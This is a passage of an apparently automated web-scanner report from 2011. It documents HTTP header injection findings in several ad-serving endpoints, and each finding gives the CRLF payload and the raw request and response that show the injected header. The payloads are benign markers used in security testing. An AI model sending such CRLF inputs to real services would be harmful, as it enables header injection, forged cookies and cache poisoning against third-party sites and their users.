The value of the exch request parameter is copied into the x-mm-debug response header. The payload b7a2e%0d%0a2669694ed50 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=b7a2e%0d%0a2669694ed50&id=5aW95q2jLzEvWlRabVlUbGxaVGt0WXpJeU55MDBOalF3TFRsbU5XRXRObVZpWkRFNE9USXhPREF4L05HUXpOekF5WW1NdE9ETTVaUzB3Tmprd0xUVXpOekF0TTJNeE9XRTVOVFl4TWprMS81OTM0NDM1NTMxNzIwNzUzMS8xMDk0NDkvMTAxNzcyLzUvbThsREliU1ZlNzdkUGpqWXBkdTFCZkNVNWFKNUNxdlZJZHc1OFcxRHRPOC8/G30W_HpUDJzTo5VAvU0finu0Bsc&price=AAABLiHmeN0RSsxpo1GHObFhTeUvm0-oCOAPtQ HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10001:1297389082|1:1297088631|10004:1297088634|11:1297045671|2:1297087036|3:1297045592|4:1296924138|5:1297087118|9:1297087161; uuid=4d3702bc-839e-0690-5370-3c19a9561295; ts=1297647383

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 02:01:37 GMT
Server: MMBD/3.4.3.2
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - b7a2e
2669694ed50

x-mm-host: ewr-bidder-x2
Connection: keep-alive

Request not found

1.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f57%0d%0a3fb48ff6f67 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204319&PluID=0&w=728&h=90&ord=121268265541127022&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=121268265541127022&mt_id=109450&mt_adid=100341&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hABkhFwA1TX4AAAAAAP9.HwAAAAAAAAAAAAYAAAAAAA8AAwABFH32IwAAAAAARqMHAAAAAADDeikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABeAQ8AAAAAAAIAAwAAAAAAw.UoXI-i8z9cukkMAqv-PwEAAAAAAAVAZmZmZmZmEEABAAAAAAAFQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACy4jPc7mqhCV1QdvLC4KD5ygPw8Rr.jBeWye7lAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D728x90%26s%3D1515801%26r%3D1%26_salt%3D1804486375%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,6fcbc4c0-37da-11e0-8341-003048d6d89e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; B3=8bvZ0000000001t68qiu0000000002t689PS000000000St87oaf0000000001t889PT000000000.t88fq40000000001t884fB0000000001t88mb20000000001t48i440000000001t28bwx0000000001t48fq50000000003t87PrH0000000001t782790000000002t5852G0000000003sS8fq70000000001t88qav0000000008tb7dNH0000000002sZ86Bm0000000001t684ZE0000000001t67GHq0000000001s.8j4q0000000001t67FCH0000000001s.84ZF0000000002t68nAl0000000002t68cVQ0000000001sV82980000000001t38fq20000000003t8852N0000000001s.84U10000000001t687ma0000000001s.6o.Q0000000001sY8fq30000000002t88qaw0000000004tc7gi30000000001sG8i430000000001t2852z0000000001sS852A0000000001sS8qay0000000001t787H10000000001td8n7e0000000002tb; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57%0d%0a3fb48ff6f67

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=1948&BWDate=40587.401238&debuglevel=&FLV=10.2154&RES=128&WMPV=037f57
3fb48ff6f67
; expires=Sat, 14-May-2011 20: 33:39 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=gPVtafzY0bnA00001gSdsafy50aSU00003gLnTaeKR09sO00001h5j3afvK07l00000.h5iUafy507l00000Sf+JvabEk02WG00002fFb9afAF02WG00001gDQzahdw07ZZ00001gYyfadw90cvM00001gDa8aeXd0aA900001gYRSaeKR09sO00001gL2MadKj0bdR00001hghLaeVW09SF00002g7VJafdh08.I00001h802ae7k0c6L00001gKXMaepH0bdR00001gFjwaeKR09sO00001gKXNaepP0bdR00001gYx+adw90cvM00001heXeaf5V0c9M00001heXfagzX0c9M00001gy3.ach00c9M00001gHrHaeKS09sO00001gSdkafvD0aSU00001h6moagvf0aMN00002heXgagXR0c9M00002heXhahnN0c9M00004gK8raeXe0aA900001gSdmafy60aSU00002heXiagzX0c9M00004heXjafWs0c9M00001gSdnafwN0aSU00003hbwIaeVY09SF00002gSdpafvK0aSU00001heXaaf9P0c9M00001gvKEacgY0c9M00001ge4Gack+0bM000001g+nBaeUD02Hn00001gNQ4ae7r0c9M00001ge4Hack+0bM000001; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t689PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav0000000009td8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG8qaw0000000004tc852z0000000001sS8qay0000000001t7852A0000000001sS8n7e0000000002tb87H10000000001td; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 01:33:39 GMT
Connection: close
Content-Length: 2219

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

1.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 7882f%0d%0adcb3cfdd72c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=7882f%0d%0adcb3cfdd72c&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:7882f
dcb3cfdd72c
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4228

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',7882f

...[SNIP]...

1.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload cefd9%0d%0a310d8c3cc8d was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=cefd9%0d%0a310d8c3cc8d&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFad=0:0:0; FFcat=305,2942,9:305,4506,17:1120,1,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: cefd9
310d8c3cc8d
;expires=Wed, 16 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
X-Varnish: 1725802099
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2283
Date: Mon, 14 Feb 2011 01:29:12 GMT
Connection: close



1.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 148bc%0d%0a00a581bb834 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/148bc%0d%0a00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:08 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/148bc
00a581bb834
/LJ7DC3I6ENDUDJRX7PVZRX/DSTFX4IPGNDVXKJZOC5QMN.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


1.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 90fad%0d%0a5b0b82ad641 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/DBLH4FNWEJG3HHKBYW3CFN/90fad%0d%0a5b0b82ad641?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:09 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/DBLH4FNWEJG3HHKBYW3CFN/90fad
5b0b82ad641
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


1.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload ae973%0d%0a0345b07197e was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ae973%0d%0a0345b07197e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ae973
0345b07197e
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ae973
0345
...[SNIP]...

1.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29b5a%0d%0ac4af126ee8c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=29b5a%0d%0ac4af126ee8c&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:29b5a
c4af126ee8c
